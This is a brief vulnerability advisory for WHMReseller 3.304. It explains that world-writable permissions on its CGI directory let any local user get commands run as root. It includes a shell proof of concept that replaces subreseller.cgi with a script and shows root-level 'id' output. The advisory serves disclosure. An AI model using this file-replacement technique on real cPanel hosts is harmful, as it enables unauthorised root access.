WHMReseller 3.304 - any local user could execute commands as root
DESCRIPTION
World writable permissions on /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller allowed any local user to execute command as root.
IMPACT
Local users could obtain full root access.
When WHMReseller 3.304 was installed, it changed the permissions of the whmreseller/ directory to 0777:
31802 chmod("./whmreseller", 0777) = 0
As such, you can rename and then recreate any existing file in that directory.
[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller [user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ mv subreseller.cgi subreseller.cgi.old [user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ cat > subreseller.cgi << EOF #!/bin/sh /usr/bin/id > /home/user/id.out EOF
The next time a reseller accesses WHMReseller, your commands in the subreseller.cgi file you created will be executed as root:
[user@host ~]$ cat id.out uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)